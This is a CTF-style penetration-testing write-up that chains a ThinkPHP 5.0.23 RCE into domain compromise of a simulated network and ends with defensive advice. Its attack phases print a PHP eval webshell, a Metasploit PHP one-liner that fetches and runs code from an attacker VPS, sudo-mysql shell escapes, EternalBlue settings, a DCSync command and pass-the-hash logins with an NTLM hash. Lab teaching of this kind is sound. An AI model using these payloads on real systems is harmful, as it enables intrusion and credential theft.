Comprehensive Penetration Testing Walkthrough: ThinkPHP RCE to Domain Controller Compromise

Executive Summary

This document presents a detailed penetration testing case study based on a simulated enterprise environment. The engagement demonstrates a complete attack chain from initial reconnaissance through external-facing services to full domain compromise. The scenario illustrates common security weaknesses found in real-world environments and provides educational insights into both offensive techniques and defensive considerations.

Learning Objectives:

Understanding web application vulnerability identification
Learning remote code exploitation methodologies
Mastering internal network reconnaissance techniques
Comprehending Active Directory attack vectors
Developing comprehensive penetration testing workflows

Environment Overview and Target Information

Target Infrastructure

The engagement focuses on a simulated corporate network accessible through a public-facing IP address. The target environment replicates common enterprise architectures with multiple security zones and varying levels of hardening.

Initial Target Information:

Public IP Address: Assigned dynamically per engagement session
Network Type: Simulated enterprise environment
Objective: Capture multiple flags distributed across the network
Environment Name: Initial Simulation Scenario

Important Notes for Reproduction:

Target IP addresses vary between sessions due to dynamic allocation
Internal network addressing remains consistent across sessions
The environment is designed for educational purposes
All activities should be conducted within authorized testing frameworks

Engagement Rules and Scope

Before commencing any penetration testing activities, it is essential to establish clear boundaries:

Authorized Activities:

Network reconnaissance and enumeration
Vulnerability scanning and identification
Exploitation of identified vulnerabilities
Privilege escalation attempts
Lateral movement within the compromised network
Data exfiltration simulation (flag capture)

Prohibited Activities:

Denial of service attacks
Attacks on infrastructure outside the defined scope
Persistent access establishment beyond engagement duration
Real-world application of techniques without authorization

Phase One: Initial Reconnaissance and Information Gathering

Port Scanning Methodology

The first phase of any penetration test involves comprehensive port scanning to identify potential entry points. A multi-layered scanning approach provides the most complete picture of the target's network exposure.

TCP Full Port Scan:
The initial scanning combines high-speed port discovery with detailed service fingerprinting. Using RustScan for rapid port identification followed by Nmap for service detection provides an efficient workflow.

# High-speed port discovery
rustscan -a <target-ip> -r 1-65535 -- -sV -O -Pn -n -oA tcp_ports

# Detailed service fingerprinting
nmap -sV -O -Pn -n <target-ip> -oA detailed_scan

Scan Results Analysis:
The scanning reveals two open TCP ports requiring further investigation:

Port	Service	Version	Risk Level
22/tcp	SSH	OpenSSH 8.2p1 Ubuntu	Medium
80/tcp	HTTP	Apache httpd 2.4.41	High

The operating system fingerprint indicates Ubuntu Linux, which informs subsequent exploitation strategy and payload selection.

UDP Port Assessment:
High-value UDP ports are scanned to identify additional services that might provide alternative attack vectors. The scan covers the top 20 most common UDP services.

nmap -sV -sU --top-ports 20 <target-ip> -Pn -n -oA udp_scan

Results indicate all UDP ports show "open|filtered" status, suggesting either firewall filtering or no responsive services. Given the clear TCP attack surface, UDP enumeration is deprioritized.

Web Application Analysis

With port 80 identified as the primary attack surface, detailed web application reconnaissance begins.

Initial Browser Assessment:
Accessing the web application reveals a login interface with several anomalous behaviors:

Authentication attempts redirect to a non-existent page endpoint
Registration functionality appears non-functional
User interface elements lack proper backend integration

These observations suggest the login page may be a decoy or incomplete implementation, directing attention to alternative discovery methods.

Source Code Examination:
Reviewing the page source code reveals critical information hidden in HTML comments:

<!-- Backend API endpoint: http://localhost:8080/powers/pow/regUsers -->

This comment exposes an internal API endpoint running on port 8080. Direct access attempts from external networks fail, indicating the service is bound to localhost or protected by network segmentation.

Directory Enumeration:
Systematic directory brute-forcing uncovers additional application structure:

ffuf -u http://<target>/FUZZ \
     -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
     -e .php,.phtml,.html,.txt,.bak,.old,.swp \
     -ac -recursion -recursion-depth 2

Discovered Resources:

/robots.txt - Contains no restrictive directives
/static/ - Directory with browsing enabled but no sensitive content
/router.php - Potential routing mechanism for API requests

Parameter Discovery Attempts:
The router.php file suggests a parameterized routing system. Extensive parameter brute-forcing is conducted using both GET and POST methods:

# GET parameter discovery
ffuf -u "http://<target>/router.php?FUZZ=test" \
     -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
     -mc 200 -fs 0

# POST parameter discovery
ffuf -u "http://<target>/router.php" \
     -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
     -X POST -d "FUZZ=test" \
     -H "Content-Type: application/x-www-form-urlencoded" \
     -mc 200 -fs 0

No valid parameters are identified through this approach, necessitating alternative identification methods.

Framework Identification

Visual analysis of the application interface suggests familiarity with common PHP frameworks. Systematic fingerprinting confirms the underlying technology stack.

Favicon Hash Analysis:
The application's favicon is extracted and hashed using the MurmurHash3 algorithm for framework identification:

import mmh3
import base64
import requests

response = requests.get('http://<target>/favicon.ico')
favicon_hash = mmh3.hash(base64.encodebytes(response.content))
print(f"Favicon Hash: {favicon_hash}")

While the hash lookup in public databases returns no matches, alternative fingerprinting tools provide positive identification.

Automated Fingerprinting:
Using Observer_WARD for technology detection:

observer_ward -t http://<target>/favicon.ico

Identification Results:

Primary Framework: ThinkPHP
Web Server: Apache HTTP

Version Determination:
Triggering application error messages reveals the specific framework version:

http://<target>/index.php?s=xxx/xxx/xxx

Error output indicates ThinkPHP Version 5.0.23, which is known to contain multiple critical vulnerabilities.

Phase Two: Initial Compromise

Vulnerability Research and Exploitation

With the framework version identified, targeted vulnerability research begins. ThinkPHP 5.0.23 contains a well-documented remote code execution vulnerability.

Vulnerability Reference:

CVE: ThinkPHP 5.x Remote Code Execution
Severity: Critical
Attack Vector: Network
Authentication Required: None

Exploitation Verification:
A proof-of-concept payload confirms the vulnerability is exploitable in the target environment. The vulnerability allows arbitrary PHP code execution through crafted HTTP requests.

Webshell Deployment

Following successful exploitation verification, a persistent access mechanism is established through webshell deployment.

Working Directory Identification:
Determining the current working directory is essential for strategic webshell placement:

# Command execution through vulnerability
pwd
# Output: /var/www/html/

Directory Listing:

ls
# Output: favicon.ico, index.php, robots.txt, router.php, static/

The current directory corresponds to the web root, meaning any files created here will be directly accessible via HTTP.

Webshell Creation:
A minimal PHP webshell is created for command execution:

echo '<?php @eval($_REQUEST["x"]);?>' > /var/www/html/shell.php

Critical Implementation Note:
Command syntax requires careful attention to shell quoting behavior. Single quotes must be used to prevent shell variable expansion:

Incorrect (will fail):

echo "<?php @eval($_REQUEST['x']);?>" > shell.php

Correct:

echo '<?php @eval($_REQUEST["x"]);?>' > shell.php

The difference stems from shell interpretation rules where double quotes allow variable expansion while single quotes preserve literal content.

Webshell Connection and Verification

With the webshell deployed, connection is established using standard webshell management tools.

Connection Parameters:

URL: http://<target>/shell.php
Password Parameter: x
Method: POST

Successful connection provides interactive command execution capabilities with www-data user privileges.

Phase Three: Post-Exploitation and Privilege Escalation

Internal Network Reconnaissance

Initial post-compromise activities focus on understanding the compromised system's network context and identifying potential lateral movement opportunities.

Network Interface Analysis:

ip addr

Key Findings:

Internal IP Address: 172.22.1.15
Network Segment: 172.22.0.0/16
Interface: eth0 (primary network interface)

System Information Gathering:

hostname && cat /etc/issue && uname -a && cat /etc/hosts

Collected Intelligence:

Hostname: ubuntu-web01
Operating System: Ubuntu 20.04.4 LTS
Architecture: x86_64
Domain Membership: Standalone (not yet joined to domain)

Routing Table Analysis:

ip route show

Network Topology Insights:

Default Gateway: 172.22.255.253
Direct Network: 172.22.0.0/16 (scope link indicates direct connectivity)
The compromised host has direct access to the internal network segment

Privilege Escalation Analysis

With initial access established, systematic privilege escalation enumeration begins. Multiple vectors are investigated concurrently.

Enumeration Categories:

Sudo permissions and misconfigurations
SUID/SGID binary exploitation
PATH manipulation opportunities
Kernel vulnerability assessment
Credential harvesting possibilities

Sudo Permission Discovery:

sudo -l

Critical Finding:

User www-data may run the following commands on ubuntu-web01:
    (root) NOPASSWD: /usr/bin/mysql

The www-data user can execute MySQL commands as root without password authentication. This misconfiguration provides a direct privilege escalation path.

MySQL-Based Privilege Escalation

GTFOBins documentation provides established techniques for privilege escalation through MySQL.

Standard Escalation Technique:

sudo mysql -e '\! /bin/sh'

This command leverages MySQL's system command execution capability to spawn an interactive shell. However, webshell environments present unique challenges for interactive shell establishment.

Webshell Limitations:
Webshell management tools simulate terminal interfaces through HTTP request-response cycles. True interactive shells require persistent bidirectional communication that standard webshells cannot provide.

Adapted Approach:
Since interactive shells are not feasible directly through the webshell, command execution with output return is verified:

sudo /usr/bin/mysql -e '\! whoami'
# Output: root

Successful execution confirms root-level command execution capability, enabling further exploitation activities.

Phase Four: Internal Network Penetration

Tool Deployment Strategy

Comprehensive internal network assessment requires specialized tools not present on the compromised system. Strategic tool deployment becomes essential.

Fscan Tool Selection:
Fscan is chosen for internal network scanning due to its:

Comprehensive protocol support
Efficient scanning algorithms
Built-in vulnerability detection
Single binary deployment

Deployment Challenge:
The attack infrastructure resides on a private network without direct connectivity to the target. A publicly accessible relay server facilitates tool transfer.

Relay Server Configuration:

# Establish reverse SSH tunnel
ssh -R 0.0.0.0:4444:localhost:4444 user@vps-ip -N

# Start HTTP server on attack machine
python3 -m http.server 4444

Tool Download and Execution:

# Download through compromised host
wget http://vps-ip:4444/fscan

# Set executable permissions with elevated privileges
sudo /usr/bin/mysql -e '\! chmod +x fscan'

Metasploit Framework Integration

For stable reverse shell establishment and advanced post-exploitation capabilities, Metasploit Framework integration is implemented.

Web Delivery Module Configuration:

use multi/script/web_delivery
set target PHP
set LHOST <vps-ip>
set SRVPORT 6666
set payload payload/php/meterpreter/reverse_tcp
run

Payload Execution:
The module generates a PHP payload that establishes a reverse Meterpreter session:

php -d allow_url_fopen=true -r "eval(file_get_contents('http://<vps-ip>:6666/payload', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"

Session Establishment:
Successful execution provides a Meterpreter session with www-data privileges, enabling advanced post-exploitation activities.

Shell Stabilization:

# Upgrade to interactive shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

# Escalate to root
sudo mysql -e '\! /bin/bash'

Comprehensive Internal Network Scanning

With stable access established, systematic internal network enumeration begins.

Full Network Scan:

./fscan -h 172.22.0.0/16

Scan Results Summary:

Host	Open Ports	Hostname	Operating System	Critical Findings
172.22.1.2	88, 135, 139, 445	DC01	Windows Server 2016	Domain Controller
172.22.1.18	80, 135, 139, 3306, 445	XIAORANG-OA01	Windows Server 2012 R2	OA System, MySQL
172.22.1.21	135, 139, 445	XIAORANG-WIN7	Windows Server 2008 R2	MS17-010 Vulnerable
172.22.255.253	-	Gateway	-	Network Gateway

Domain Information:

Domain Name: xiaorang.lab
Domain Controller: DC01.xiaorang.lab
Total Identified Hosts: 4 (excluding gateway)

Network Visualization

Complex network engagements benefit from visual documentation. Mind mapping tools help track:

Compromised hosts and access levels
Credential inventory
Lateral movement paths
Remaining objectives

Phase Five: Active Directory Exploitation

EternalBlue Exploitation (MS17-010)

The vulnerability scan identified MS17-010 (EternalBlue) on host 172.22.1.21, presenting an immediate high-priority exploitation opportunity.

Route Configuration:
Before exploiting internal hosts, network routing must be configured to allow traffic forwarding:

# Add route to internal network
run autoroute -s 172.22.0.0/16

# Establish SOCKS proxy
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set SRVPORT 1080
set VERSION 5
run -j

EternalBlue Module Execution:

use windows/smb/ms17_010_eternalblue
set payload payload/windows/x64/meterpreter/bind_tcp
set RHOST 172.22.1.21
exploit

Post-Exploitation Verification:

getuid
# Output: Server username: NT AUTHORITY\SYSTEM

Direct SYSTEM-level access is achieved, providing maximum privileges on the compromised host.

Credential Harvesting

With SYSTEM access on a domain-joined machine, credential harvesting operations commence.

Mimikatz Integration:

load kiwi
creds_all

Harvested Credentials:

Local machine account credentials
Cached domain credentials
Service account information

DCSync Attack:
To extract domain-wide credentials, a DCSync attack is executed:

kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv"

DCSync Explanation:
DCSync attacks exploit the Directory Replication Service Remote Protocol (MS-DRSR) that domain controllers use to synchronize directory information. By impersonating a domain controller, attackers can request password hash synchronization.

Requirements for DCSync:

DS-Replication-Get-Changes permission
DS-Replication-Get-Changes-All permission
Typically held by Domain Admins, Enterprise Admins, and domain controller computer accounts

Extracted Domain Credentials:

Username	RID	Hash Type	Significance
krbtgt	502	NTLM	Kerberos TGT service account
Administrator	500	NTLM	Domain administrator account
Marcus	1106	NTLM	Domain user account
Charles	1107	NTLM	Domain user account
DC01$	1000	NTLM	Domain controller machine account

Domain Controller Access

With the Administrator hash obtained, direct domain controller access is established.

WMI Execution:

proxychains python3 wmiexec.py xiaorang.lab/administrator@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8

Flag Discovery:

dir flag* /s

The search reveals the third flag location, completing the primary engagement objective.

Phase Six: Secondary Target Compromise

OA Server Access

The DCSync operation harvested credentials for multiple systems including the OA server at 172.22.1.18.

Direct Access:

proxychains python3 wmiexec.py xiaorang.lab/administrator@172.22.1.18 -hashes :10cf89a850fb1cdbe6bb432b859164c8

Flag Retrieval:
Systematic search locates the second flag, completing the engagement's primary objectives.

Alternative Exploitation Path

During engagement documentation, an alternative attack path through the OA system is identified for educational completeness.

OA System Analysis:

Application: 信呼协同办公系统 (XinHu Collaborative Office System)
Authentication: Weak credentials (admin/admin123)
Vulnerability: Unauthorized file upload leading to RCE

Attack Chain:

Brute-force administrative credentials
Access file upload functionality
Upload malicious payload
Exploit file extension bypass vulnerability
Execute arbitrary code with SYSTEM privileges

This alternative path demonstrates the importance of thorough reconnaissance and multiple attack vector consideration.

Defensive Recommendations and Mitigations

Web Application Security

Framework Updates:

Maintain current versions of all web frameworks
Implement automated vulnerability scanning
Establish patch management procedures

Input Validation:

Implement comprehensive input sanitization
Use parameterized queries for database operations
Deploy Web Application Firewalls (WAF)

Network Segmentation

Zone Isolation:

Separate public-facing services from internal systems
Implement strict firewall rules between zones
Monitor inter-zone traffic for anomalies

Access Controls:

Enforce principle of least privilege
Implement network access control (NAC)
Regular access review and certification

Active Directory Hardening

Credential Protection:

Enable Credential Guard on supported systems
Implement Local Administrator Password Solution (LAPS)
Regular password rotation for service accounts

Monitoring and Detection:

Deploy advanced threat detection solutions
Monitor for DCSync and similar attacks
Implement Security Information and Event Management (SIEM)

Privilege Management:

Minimize domain admin membership
Use tiered administration models
Implement just-in-time privileged access

Conclusion and Key Learnings

This penetration testing engagement demonstrates a complete attack chain from initial reconnaissance to domain compromise. Key learnings include:

Technical Insights:

Framework version disclosure enables targeted exploitation
Privilege escalation opportunities often exist through misconfigured permissions
Internal network segmentation is critical for limiting lateral movement
Active Directory requires specialized security controls and monitoring

Process Recommendations:

Regular vulnerability assessments and penetration testing
Comprehensive security awareness training
Incident response plan development and testing
Continuous security monitoring and improvement

Educational Value:
This case study serves as an educational resource for understanding modern penetration testing methodologies and the importance of defense-in-depth security strategies. All techniques described should only be applied in authorized testing environments with proper permissions and legal compliance.

Note: This document is intended for educational purposes only. All penetration testing activities should be conducted within legal boundaries with explicit authorization from system owners.